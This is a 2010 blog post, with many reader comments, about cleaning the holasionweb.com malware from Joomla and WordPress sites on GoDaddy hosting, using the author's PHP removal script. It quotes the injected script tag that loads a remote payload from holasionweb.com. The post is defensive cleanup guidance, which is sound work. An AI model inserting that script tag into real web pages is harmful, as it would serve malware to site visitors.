Daniel Ansari’s blog Random software musings

May 12, 2010

holasionweb.com

Filed under: Malware — admin @ 2:44 pm

One of my Joomla sites on shared GoDaddy hosting got re-infected this morning with this malware, which runs this script from every php file that it infects:

<script src=”http://holasionweb.com/oo.php”></script>

Interestingly, none of my other GoDaddy sites have got infected yet (and this blog is running an older version of WordPress), including one other Joomla site on the same server.

I modified my Gumblar removal script and added a regular expression to remove this malware.  It can be downloaded here.

Unlike the script at Securi.net (at the time of writing), this script does not leave a blank line at the top of your files, thus, you won’t get any errors from your web applications – it leaves your files in exactly the same state as before the infection.  It also saves your original infected file with a .bak extension, just in case you need to keep the originals for some reason.  These can be deleted later, and will not affect your site.

Instructions for use

  1. Place the file scan_files.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/scan_files.php
  3. Use scan_files.php?v=1 to run it in verbose mode.
  4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
  5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.

Notes:

  • The script skips files greater than approx 1 MB in size.
  • If the path to the file ends with /images/image.php or /images/gifimg.php, the script deletes it in update mode.  That’s because this was one of the signatures of the Gumblar malware.

Update (Aug 19, 2010): I added another script in scan_files.zip—that is delete_infected_backups.php.  In order to delete the .bak files:

  1. Place the file delete_infected_backups.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/delete_infected_backups.php
  3. Use delete_infected_backups.php?u=1 to run it in update mode, where the .bak files will actually be deleted.
  4. The script deletes all files with names ending in:
    • .html.bak
    • .htm.bak
    • .shtml.bak
    • .js.bak
    • .php.bak

51 Comments »

  1. thanks very much , you saved my site

    Comment by michael — May 12, 2010 @ 9:41 pm

  2. You are the best. We got hit on two GoDaddy sites starting May 8th. Great script.

    Comment by Lee Leslie — May 12, 2010 @ 10:10 pm

  3. please teach me how to remove .bak file
    thank you

    Comment by michael — May 12, 2010 @ 11:18 pm

  4. @michael: lol, I don’t have a script for that yet, but I could make one easily enough – I’m just going on a 4-day trip tomorrow evening, so I won’t be able to write it until I get back.

    I would leave the .bak files on the server anyway for now, until the cause of the infection has been determined, because until then, it’s very possible that you’ll get reinfected, run this script again, and have new .bak files created.

    Comment by admin — May 12, 2010 @ 11:34 pm

  5. Dude, You saved my butt with this script. I got hit hard with the virus/hack this morning and even though I restored my files from a previous date, I was still having issues with the halisionweb thing. I ran your PHP script and worked like a charm. Thanks again for putting this out there for us poor WordPress hackees.

    Jeff

    Comment by Jeff Revell — May 13, 2010 @ 12:04 am

  6. wow, you are my hero. thank you, thank you, thank you.

    Comment by se — May 13, 2010 @ 1:44 am

  7. Dude!!! are you serious? is it really that easy??? You Are Awesome!!! Thank You So Much… Get ready for your tool and blog become popular!!! 🙂 I ran your scan_files script on my GenuineAid.com and now the blog become faster and no more of holasionweb junk visible. I also changed my admin password as soon as I finished with your script. Thank you 🙂

    Comment by Vladimir — May 13, 2010 @ 9:18 am

  8. […] คลิกเพื่ออ่านและโหลดการแก้ไขหากมี สคริปไวรัสตัวนี้ฝังอยู่ครับ ลิงค์ […]

    Pingback by Doohub blog » Blog Archive » malwere holasionweb.com — May 13, 2010 @ 10:05 am

  9. Daniel:
    Thank you for posting such a helpful post about this issue. If you wouldn’t mind, please contact me via email to discuss writing an article for my site to go over this problem, and your solution. I think you could help a lot of people.

    Thanks,
    Traci

    Comment by Traci Hayner Vanover — May 13, 2010 @ 10:06 am

  10. Dude, I even wrote about you and your help on my Blog 🙂

    Comment by Vladimir — May 13, 2010 @ 10:32 am

  11. @Vladimir: Thanks, mate. Don’t forget you need the ?u=1 at the end of the URL to fix the files.

    Comment by admin — May 13, 2010 @ 10:58 am

  12. Do you know how they got in? Old script? or a godaddy fault?

    Comment by Trevyn — May 13, 2010 @ 1:01 pm

  13. @Trevyn: That’s the 64 million dollar question. We’re still waiting for someone to come up with the exact method of infection. Until that happens, we’re not safe.

    Comment by admin — May 13, 2010 @ 1:13 pm

  14. Thanks dear for the script. You saved my life.
    Any tips from you so that same thing shouldn’t occur again.

    Comment by Praveen — May 13, 2010 @ 4:21 pm

  15. Sorry, I don’t know how to prevent it – at the moment nobody does. Just monitor your site at least twice per day until the method of prevention is found, and run this script if you get reinfected.

    Comment by admin — May 13, 2010 @ 4:24 pm

  16. Gracias….. me fue de ayuda!!!

    Comment by yaev — May 13, 2010 @ 11:09 pm

  17. Thanks so much for this! It worked great. I’d be very interested to know how to prevent this.

    Comment by Albert — May 14, 2010 @ 6:28 am

  18. Thanks! Your script saved me a lot of work and trouble. I noticed that in my home directory there was a script called gdform.php. I think that script causes the problem.

    Comment by Cancerinform — May 15, 2010 @ 6:06 pm

  19. Thanks… running this script as a CRON job on the hour

    Comment by Bourgy — May 15, 2010 @ 8:23 pm

  20. This script is a life saver, thank you so much.

    Comment by Craig — May 16, 2010 @ 3:00 am

  21. wow, thank you so much for this

    Comment by joey — May 17, 2010 @ 12:28 pm

  22. Thanks for the script Daniel. It’s a lifesaver. Have you heard anything about whether GoDaddy is taking responsibility for this, or if there’s a way to prevent it? Also, the script made bak files for all my directories except the root directory. It looks like the files in the root directory were cleaned, but there’s no bak files for them. Is this the way it’s supposed to be? Lastly, I’d like to put in my vote for a script to remove the bak files when they are no longer necessary. Thanks again!

    Comment by Doug — May 17, 2010 @ 1:13 pm

  23. Made another script (to detect and cure the eval(base64_decode) hack, that is a bit less overwhelming, published it in this post: http://bit.ly/c2yGCP

    Hope you don’t mind.

    Peter

    Comment by Peter — May 17, 2010 @ 1:38 pm

  24. VERY NICE SCRIPT KEEP UP THE GOOD WORK

    Comment by Mike — May 19, 2010 @ 1:18 am

  25. Thanks so much for sharing this script. It has helped me get back live after 1 week of RND.

    Comment by Amit Desai — May 20, 2010 @ 9:18 am

  26. […] Daniel Ansari’s blog […]

    Pingback by Fix for Wordpress sites and blogs hosted on Godaddy infected by holasionweb virus — May 20, 2010 @ 10:30 am

  27. Hi,

    thanks for sharing this tool! it saved my ass!!

    keep up the good work 🙂

    Supun

    Comment by Supun Perera — May 21, 2010 @ 9:59 am

  28. thank you!!

    now if only I can figure out what’s wrong with my dashboard’s css…

    Comment by Lillian — May 23, 2010 @ 12:44 am

  29. Thanks SO much. It took me about a week to find this post, but the script worked like a gem for me. thanks so much!

    Comment by Jeffrey — May 23, 2010 @ 4:55 pm

  30. Thank you very very very much!!!!! You saved my site. My site was infected about a week ago.

    Comment by PZ — May 25, 2010 @ 1:12 am

  31. Daniel. You are da man!

    I gave you a link in my blog and a thankyou. Your script cleaned my blog and my forum.

    YOU ROCK!!

    Comment by Jafar Calley — May 28, 2010 @ 4:03 pm

  32. Thank you very much for this removal script. It was easy to apply and worked great on SMF 1.1.11 (Simple Machines Forum).

    Comment by Carl — May 31, 2010 @ 10:12 am

  33. Hi Daniel…

    I have been wondering for weeks why my Admin Panel has been acting up? I thought it was a server issue, but didn’t go back to figure out what it was until today. So, I did a full site back up and upgrade only the problems seemed to be worse, I had Lost ALL Control over certain areas of my Admin. (I am using Interspire Webpublisher on this particular site. Well, then I decided to go back and restore the older version and that was when I kept getting redirected to this holasionweb.com script that really freaked me out. I found your site when I Googled the holasionweb.com word. Your scan_files.php script worked!!! Yeah! I have done a check of my hosting accounts with Go Daddy and hopefully this is the only error that I have… Could you answer me one thing… Is this file enough to scan every domain that I have hosted or do I need to do the scan on each individual domain?? You are truly a Gem! Thank You for your Great Help… Meg

    Comment by Meg — June 4, 2010 @ 10:05 am

  34. Thanks for the nice comments, Meg. It depends on how your sites are hosted. One of my sites on GoDaddy is hosted on a Premium account and has one main domain, and several other domains in subdirectories. If that site got infected, it would be enough to run the script once for the main site (domain), and the subdirectories (including the other domains) would also get cleaned.

    You may need to run it for each domain, however, if the directories for the domains are not in the same hierarchy or if the domains are hosted on different servers.

    Comment by admin — June 4, 2010 @ 10:13 am

  35. Worked like a charm. Thank you. I have several WP sites hosted inside directories on the root of the server and was thinking that maybe one of them got infected and this resulted in the main site getting flagged. Thanks.

    Comment by P — June 23, 2010 @ 10:51 pm

  36. I ran your script (been having lots of trouble with my wp site, spreading the infection to my photocart also hosted on the same server), and now I think things are screwy 🙁 I went to change my password and all I get is “Warning: Cannot modify header information – headers already sent by (output started at /home1/funfresh/public_html/wp-config.php:4) in /home1/funfresh/public_html/wp-includes/pluggable.php on line 890” trying to access my admin side– help? I am not website savvy at all, so any suggestions (for the technically challenged) would be greatly appreciated!

    Thanks!

    Comment by Amy — July 8, 2010 @ 11:45 am

  37. Hi Amy, could you put the contents of the file /home1/funfresh/public_html/wp-includes/pluggable.php up on http://pastie.org and give me the link? I could ask for wp-config.php too, but only if you make sure that you change any sensitive data there.

    Comment by admin — July 8, 2010 @ 1:43 pm

  38. pastie keeps timing out 🙁 Would you be willing to email me (amylantz03 at yahoo dot com) so I can send it to you in a text doc? Thanks 🙂

    Comment by Amy — July 8, 2010 @ 9:13 pm

  39. can i use this script on an ASP website?

    regards
    akhalifa

    Comment by akhalifa — July 21, 2010 @ 7:08 am

  40. I have a wordpress MU site and it’s infected but i don’t know if it is this malware. I used your script as described but it didn’t work for me. Any tip?

    Comment by john — August 4, 2010 @ 9:06 am

  41. akhalifa, I’m sorry, you can’t, as this is a PHP script, so it won’t work under ASP.

    Comment by admin — August 4, 2010 @ 9:14 am

  42. John, I looked at your site and didn’t see any malware signs in the source code of the home page, neither did my Avira detect anything. How do you think it’s infected?

    Comment by admin — August 4, 2010 @ 9:15 am

  43. I don’t have any clue. I’m using ixwebhosting.com for hosting and all of my wordpress sites are infected-hacked. I’m using avast antivitus and it stops firefox from opening my sites and the admin area from wordpress as well.I’m confused.

    Comment by john — August 4, 2010 @ 10:04 am

  44. I will add a temporary index.html file to the root of my websites that states my site is down for maintenance.There’s no reason to say my sites are infected and scare people that haven’t been infected.

    Comment by john — August 4, 2010 @ 10:07 am

  45. Does Avast tell you what the infection is? If not, you can try this: do “view source” on the page, then save it as a separate HTML file on your server. Next, hit that page in your browser to confirm that Avast still detects an infection there. From there, you can progressively cut out the HTML until Avast stops detecting something. You can hone in on the problem that way.

    Comment by admin — August 4, 2010 @ 10:20 am

  46. ok let me try this. I’ll keep you informed

    Comment by john — August 4, 2010 @ 10:56 am

  47. Avast still detects an infection there

    Comment by john — August 4, 2010 @ 10:57 am

  48. I am having a problem with this type of virus… Can you pliss help me out of here…
    See my web, and hopefully you will know may problems….

    Comment by tuikah — August 10, 2010 @ 3:24 am

  49. Wow! Thank you so much this really worked!! Super easy!!! Initially on Avast it detected an infection, but after running the removal script nothing came up.

    Comment by martin — August 12, 2010 @ 2:09 am

  50. I just added an update to this post, which explains how to remove the .bak files that were created as a result of the cleaning process. I just ran it on my production websites, so it’s been tested 🙂

    Comment by admin — August 19, 2010 @ 4:03 pm

  51. tuikah, if you go to your site in Firefox and click on the “Why was this page blocked” button, you can see at the bottom of that page, “Next steps… If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools.” If you do that, after Google has done their review, that warning should disappear.

    Comment by admin — August 19, 2010 @ 4:08 pm

RSS feed for comments on this post. TrackBack URL

Leave a comment

Powered by WordPress